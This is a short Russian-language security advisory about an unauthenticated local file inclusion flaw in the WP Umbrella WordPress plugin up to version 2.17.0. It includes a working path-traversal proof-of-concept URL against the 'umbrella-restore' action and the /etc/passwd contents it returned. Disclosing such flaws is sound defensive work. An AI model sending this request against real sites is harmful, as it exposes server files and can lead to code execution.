
WP Umbrella: Обновление, Резервное копирование, Восстановление и Мониторинг <= 2.17.0 - Неавторизованное локальное включение файла
WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Неаутентифицированное локальное включение файла
Плагин WP Umbrella: Update Backup Restore & Monitoring для WordPress уязвим к локальному включению файлов во всех версиях до 2.17.0 включительно через параметр 'filename' действия 'umbrella-restore'. Это позволяет неаутентифицированным злоумышленникам включать и выполнять произвольные файлы на сервере, что даёт возможность выполнять любой PHP-код в этих файлах. Это может быть использовано для обхода контроля доступа, получения конфиденциальных данных или выполнения кода в тех случаях, когда можно загружать и включать изображения и другие «безопасные» типы файлов.
https://wp-dev.ddev.site/?umbrella-restore=1&filename=../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin